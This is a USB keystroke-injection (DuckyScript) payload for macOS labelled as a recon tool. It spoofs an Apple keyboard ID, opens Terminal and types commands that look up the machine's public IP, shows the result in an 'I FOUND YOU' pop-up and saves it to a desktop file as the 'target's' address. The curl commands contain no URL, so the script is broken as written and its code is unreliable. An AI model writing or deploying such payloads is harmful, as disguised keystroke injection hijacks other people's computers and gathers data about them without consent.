REM Description: Uses Mac Terminals command to do a PUBLIC I.P. lookup REM displays the results in a pop up window REM & Saves the data to a folder on the desktop REM Folder is named "Public I.P. Data" REM Title: Public I.P. Finder REM Author: Narsty REM Target: MacOS REM Version: 1.0 REM Category: Recon ID 05ac:021e Apple:Keyboard DELAY 500 GUI SPACE DELAY 500 STRING terminal DELAY 500 ENTER STRING curl -s; echo DELAY 500 ENTER DELAY 500 STRING public_ip=$(curl -s; osascript -e "tell app \"System Events\" to display dialog \"I FOUND YOU: $public_ip\" with title \"Public IP Address\"" DELAY 500 STRING mkdir ~/Desktop/"Public I.P. Data" && echo "Your TARGETS IP address is: $public_ip" > ~/Desktop/"Public I.P. Data"/public_ip.txt DELAY 500 ENTER